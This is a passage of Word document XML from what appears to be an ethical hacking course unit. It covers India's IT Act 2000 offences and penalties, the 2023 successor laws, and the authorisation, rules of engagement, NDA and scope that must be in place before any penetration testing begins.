          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a clean security audit reassures customers, investors and partners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Independent assurance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — outside testers have no internal bias and often find what an in-house team overlooks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 Legal Framework — The IT Act, 2000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why it matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every action you take as a tester in India happens inside the boundaries set by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Technology Act, 2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Breaking these boundaries — even with good intentions — is a criminal offence, not a grey area.</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1267"/>
        <w:gridCol w:w="5555"/>
        <w:gridCol w:w="2924"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5555"/>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What It Covers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Punishment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Civil liability for unauthorised access, data theft, introducing viruses, or disrupting a computer system, even without criminal intent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Compensation to the victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Tampering with computer source code that is legally required to be kept — e.g. deleting source code or altering logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Up to 3 years jail, fine up to ₹2 lakh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Turns Section 43 acts into a crime when done “dishonestly or fraudulently” — covers hacking, data theft, defacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Up to 3 years jail, fine up to ₹5 lakh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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66B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Dishonestly receiving or keeping a stolen computer resource (laptop, password, database) knowing it was stolen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Up to 3 years jail, fine up to ₹1 lakh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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66C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Identity theft — fraudulent use of another person’s password, digital signature or unique identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Up to 3 years jail, fine up to ₹1 lakh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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66F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Cyber terrorism — attacks threatening India’s sovereignty, security or critical infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Imprisonment for life</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A note on currency: the IT Act, 2000 is still the operative cyber law in India. Related laws have since been modernised — the old Indian Evidence Act's Section 65B (on admissibility of electronic records) is now </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 63 of the Bharatiya Sakshya Adhiniyam, 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the old Code of Criminal Procedure's search-and-seizure provisions now sit in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bharatiya Nagarik Suraksha Sanhita, 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This note is provided for completeness; your syllabus names the IT Act sections above, and those remain the correct answer for this unit.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Legal disclaimer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">This material explains legal concepts for educational purposes only. It is not legal advice. For an actual engagement, consult a qualified lawyer and your organisation's legal/compliance team before testing anything.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.6 Written Authorisation, Rules of Engagement, NDA and Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition and why it matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Four documents separate a legal engagement from a crime. None of the techniques in this book may be used without all four being in place first.</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2534"/>
        <w:gridCol w:w="7212"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7212"/>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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Written Authorisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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 signed document explicitly permitting testing — the single legal line between ethical hacking and an offence under Sections 43/66</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Rules of Engagement (RoE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Defines the testing window, allowed techniques, emergency contacts and escalation steps if something goes wrong</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Non-Disclosure Agreement (NDA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Legally binds the tester to keep any data, vulnerability or credential found during the test confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Scope Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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 precise list of in-scope IPs, domains and applications, and an explicit list of what is off-limits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Authorisation flow before testing begins</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709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Client request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCEBF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Scope agreed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RoE + NDA signed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCEBF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Written authorisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Testing begins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Consequences of testing without permission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Criminal liability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — prosecution under Sections 43/66/66B/66C, with jail time and fines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Civil compensation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the victim organisation can claim damages for downtime or data loss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Career and reputation loss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a conviction can bar you from future security, government or regulated jobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No “good intent” defence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a grey-hat excuse like “I was just trying to help” carries no legal weight without written authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7 The 5 Phases of Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition</w:t>
